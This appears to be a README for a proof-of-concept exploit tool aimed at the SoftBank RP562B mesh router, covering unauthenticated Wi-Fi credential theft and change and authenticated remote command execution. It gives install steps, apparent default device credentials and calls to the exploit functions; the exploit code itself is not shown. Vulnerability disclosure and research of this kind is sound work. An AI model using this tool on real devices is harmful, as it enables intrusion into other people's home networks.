PoC API that exploits multiple vulnerabilities in the SoftBank RP562B mesh device.

0xNslabs/SoftBankMeshAPI

SoftBank Mesh RP562B - Exploit Wrapper API

Overview

This repository contains a Python API to exploit known vulnerabilities in the SoftBank Wi-Fi Mesh RP562B, allowing unauthenticated attackers to obtain information about devices connected through Wi-Fi (CVE-2024-47799) and authenticated attackers to execute arbitrary OS commands (CVE-2024-45827).

SoftBank Mesh API RP562B Exploits API

Prerequisites

  • Python 3.x
  • Required Python packages listed in requirements.txt

Installation

  1. Clone the repository:

    git clone https://github.com/0xNslabs/SoftBankMeshAPI
    cd SoftBankMeshAPI
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

Configuration

Before running the script, you need to configure the device dictionary in main.py with the appropriate details:

    device = {
        "mesh_ip": "INSERT_YOUR_DEVICE_IP",
        "mesh_username": "user",
        "mesh_password": "RTconf01",
        "wifi_name": "ThePromisedLan",
        "wifi_password": "00000000",
    }

Exploiting Vulnerabilities

Unauthenticated Access to Wi-Fi Credentials (CVE-2024-47799)

To obtain Wi-Fi credentials without authentication, use the getWifiCreds function:

    response = sbmeshAPI.getWifiCreds(device)
    print(response)

To set Wi-Fi credentials without authentication, use the setWifiCreds function:

    response = sbmeshAPI.setWifiCreds(device)
    print(response)

Authenticated Remote Command Execution (CVE-2024-45827)

To execute an arbitrary OS command with authentication, use the execTelnetRce function:

    response = sbmeshAPI.execTelnetRce(device)
    print(response)

Write-Up

https://neroteam.com/blog/softbank-wi-fi-mesh-rp562b

Video Proof of Concept

Script PoC CVE-2024-47799 Remote Command Injection

Disclaimer

This software is intended for educational and research purposes only. Unauthorized access to computer systems is illegal and unethical. The authors and contributors of this software are not responsible for any misuse or damage caused by this software.